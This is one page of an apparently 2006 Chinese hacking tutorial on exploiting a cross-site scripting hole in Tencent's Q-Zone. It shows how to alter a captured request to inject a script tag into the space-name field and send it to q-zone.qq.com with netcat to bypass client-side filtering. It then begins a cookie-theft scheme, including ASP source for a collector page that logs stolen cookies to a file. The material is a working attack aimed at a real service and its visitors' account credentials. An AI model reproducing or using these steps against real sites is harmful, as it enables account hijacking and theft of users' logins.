WEB开发网
开发学院网络安全黑客技术 Q-Zone跨站入侵漏洞的详细分析与利用 阅读

Q-Zone跨站入侵漏洞的详细分析与利用

 2006-11-07 20:08:59 来源:WEB开发网   
核心提示: 2、修改提交数据将下面窗口中的提交数据内容全部复制后,保存为一个1.TXT文件,Q-Zone跨站入侵漏洞的详细分析与利用(3),将代码中的“spacename=1234567890”改为:“spacename=<script>alert(&q

2、修改提交数据

将下面窗口中的提交数据内容全部复制后,保存为一个1.TXT文件,将代码中的“spacename=1234567890”改为:“spacename=<script>alert("test")</script>”,“Content-Length: 20”改为“Content-Length: 40”

现在我们只要将这些数据提交到服务器上,就可以绕过客户端对数据的过滤了,这就要用到另外一个叫作NC的工具了。

将上面保存的“1.txt”复制到与“nc.exe”同一个文件夹中,打开Windows系统中的命令提示符窗口,在命令行下进入NC.exe所在的文件夹,输入“nc -vv q-zone.qq.com 80<1.txt”,命令执行后,就会向远程服务器提交我们修改过的数据了。

提示:我们可以将“Test”换成任意中文,但是需要先转换为IE编码,例如“测试”的IE编码为“%B2%E2%CA%D4”,具体的转换过程这里就不用多说了。

3、检测代码执行结果

打开我们的Q-Zone,此时会自动弹出一个提示窗口。说明我们已经在远程的网页中成功的插入了“<script>alert("test")</script>”这条代码!同时在修改空间名称的页面中,可以看到已提交修改的原来被限制了的空间名称。

跨站漏洞应用实例——盗取用户Cookie

上面进行的仅仅是一个简单的测试,如果攻击者在Q-Zone中写出危险的代码,例如盗取浏览网页者的Cookie内容的代码时,就很有可能获得Cookie中的各种论坛或网站的帐号及密码。下面简单的说一说这种利用方式:

1、上传Cookie收集网页

申请一个网站空间,上传一内容如下的ASP文件——info.asp,这个网页主要用来收集后面的Cookie内容。
    <%
     testfile=Server.MapPath("cookies.txt")
     msg=Request("msg")
     set fs=server.CreateObject("scripting.filesystemobject")
     set thisfile=fs.OpenTextFile(testfile,8,True,0)
     thisfile.WriteLine(""&msg& "")
     thisfile.close
     set fs = nothing
     %>

上一页  1 2 3 4  下一页

Tags:Zone 入侵 漏洞

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接